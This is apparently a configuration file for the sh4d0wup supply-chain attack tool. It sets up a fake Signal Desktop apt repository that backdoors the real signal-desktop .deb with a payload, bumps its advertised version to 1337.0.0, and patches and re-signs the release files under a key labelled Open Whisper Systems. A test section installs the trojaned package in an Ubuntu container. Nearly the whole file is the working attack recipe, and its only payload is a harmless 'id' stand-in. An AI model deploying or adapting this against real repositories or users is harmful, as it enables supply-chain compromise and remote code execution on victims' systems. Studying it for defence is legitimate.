---

upstreams:
  signal:
    url: https://updates.signal.org

signing_keys:
  apt:
    type: pgp
    uids: ["Open Whisper Systems <support@whispersystems.org>"]

artifacts:
  upstream_release:
    type: url
    url: https://updates.signal.org/desktop/apt/dists/xenial/InRelease
  upstream_index:
    type: url
    url: https://updates.signal.org/desktop/apt/dists/xenial/main/binary-amd64/Packages.gz
  upstream_metadata:
    type: apt-pkg
    artifact: upstream_index
    url: https://updates.signal.org/desktop/apt/
    pkg:
      name: signal-desktop
  upstream_pkg:
    type: url
    url_template: '{{url}}'
    template_metadata: upstream_metadata

  pkg_infected:
    type: infect
    infect: deb
    artifact: upstream_pkg
    payload: id
  index_patched:
    type: tamper
    tamper: patch-apt-package-list
    artifact: upstream_index
    compression: none
    patch:
      - name: signal-desktop
        artifact: pkg_infected
        set:
          Version:
            - 1337.0.0
          Filename:
            - pool/main/s/signal-desktop/signal-desktop_1337.0.0_amd64.deb
  index_patched_gz:
    type: compress
    compression: gzip
    artifact: index_patched
  index_patched_bz2:
    type: compress
    compression: bzip2
    artifact: index_patched
  index_patched_xz:
    type: compress
    compression: xz
    artifact: index_patched
  release_patched:
    type: tamper
    tamper: patch-apt-release
    artifact: upstream_release
    signing_key: apt
    patch:
      - name: main/binary-amd64/Packages
        artifact: index_patched
      - name: main/binary-amd64/Packages.gz
        artifact: index_patched_gz
      - name: main/binary-amd64/Packages.bz2
        artifact: index_patched_bz2
      - name: main/binary-amd64/Packages.xz
        artifact: index_patched_xz

check:
  image: ubuntu:20.04
  install_keys:
    - key: apt
      binary: true
      cmd: 'tee /usr/share/keyrings/signal-desktop-keyring.gpg > /dev/null'
  cmds:
    - 'echo "deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] http://${SH4D0WUP_BOUND_ADDR}/desktop/apt xenial main" | tee /etc/apt/sources.list.d/signal-xenial.list'
    - ["apt-get", "update"]
    - ["env", "DEBIAN_FRONTEND=noninteractive", "apt-get", "install", "signal-desktop", "-y"]

routes:
  - path: /desktop/apt/dists/xenial/InRelease
    type: static
    args:
      artifact: release_patched

  - path: /desktop/apt/dists/xenial/main/binary-amd64/Packages.gz
    type: static
    args:
      artifact: index_patched_gz

  - path: /desktop/apt/pool/main/s/signal-desktop/signal-desktop_1337.0.0_amd64.deb
    type: static
    args:
      artifact: pkg_infected

  - type: proxy
    args:
      upstream: signal